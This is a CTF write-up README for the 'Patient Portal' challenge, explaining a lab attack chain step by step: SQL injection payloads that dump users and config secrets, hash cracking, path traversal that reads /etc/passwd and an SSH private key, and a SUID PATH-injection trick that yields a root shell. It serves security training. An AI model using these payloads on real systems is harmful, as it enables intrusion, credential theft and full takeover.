Eun0us/ESPILON-CTF-2026-Writeups
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
cf7da4e7ec
ESPILON-CTF-2026-Writeups/Misc/Patient_Portal
History
Eun0us b3553ba029 ESPILON CTF 2026 — Write-ups édition 1 (33 challenges)
2026-03-22 19:18:58 +01:00
..
README.md ESPILON CTF 2026 — Write-ups édition 1 (33 challenges) 2026-03-22 19:18:58 +01:00

README.md

Patient Portal — Solution

Overview

Multi-stage challenge: SQLi → Admin Panel → Path Traversal → SSH Access → SUID Privesc → Root

Flag: ESPILON{r00t_0f_s41nt3_m1k4}

Stage 1: SQL Injection

The /search endpoint is vulnerable to UNION-based SQL injection.

Enumerate columns (6 columns)

/search?q=' UNION SELECT 1,2,3,4,5,6--

Dump table names

/search?q=' UNION SELECT 1,name,3,4,5,6 FROM sqlite_master WHERE type='table'--

Tables found: patients, users, system_config

Dump users table

/search?q=' UNION SELECT 1,username,password_hash,role,5,6 FROM users--

Results:

  • admin : e0b7e413c064de43c6c1ca40a8c175a1 (MD5 of SainteMika2026)
  • nurse01 : (irrelevant hash)

Dump system_config table

/search?q=' UNION SELECT 1,key,value,3,4,5 FROM system_config--

Key finding: ssh_passphrase = wired-med-013

Crack the admin password

echo -n "SainteMika2026" | md5sum
# e0b7e413c064de43c6c1ca40a8c175a1

Or use CrackStation / hashcat / john.

Stage 2: Admin Access

Login at /login with:

  • Username: admin
  • Password: SainteMika2026

The admin panel shows:

  • Report download links
  • System info: SSH on port 2222, user webadmin

Stage 3: Path Traversal

The report download endpoint /admin/reports?file= is vulnerable to path traversal.

Read /etc/passwd

/admin/reports?file=../../../etc/passwd

Confirms user webadmin exists.

Extract SSH private key

/admin/reports?file=../../../home/webadmin/.ssh/id_rsa

Save the key to a file locally.

Stage 4: SSH Access

chmod 600 id_rsa
ssh -i id_rsa -p 2222 webadmin@<HOST>
# Passphrase: wired-med-013  (from Stage 1 system_config table)

Stage 5: Privilege Escalation

Find SUID binaries

find / -perm -4000 -type f 2>/dev/null

Found: /opt/navi-monitor/vital-check (SUID root)

Analyze the binary

strings /opt/navi-monitor/vital-check

The binary calls system("logger -t vital-check 'check complete'") using a relative path for logger.

PATH injection

echo '#!/bin/bash' > /tmp/logger
echo '/bin/bash -p' >> /tmp/logger
chmod +x /tmp/logger
export PATH=/tmp:$PATH
/opt/navi-monitor/vital-check

This spawns a root shell (bash -p preserves the SUID euid).

Get the flag

cat /root/root.txt
# ESPILON{r00t_0f_s41nt3_m1k4}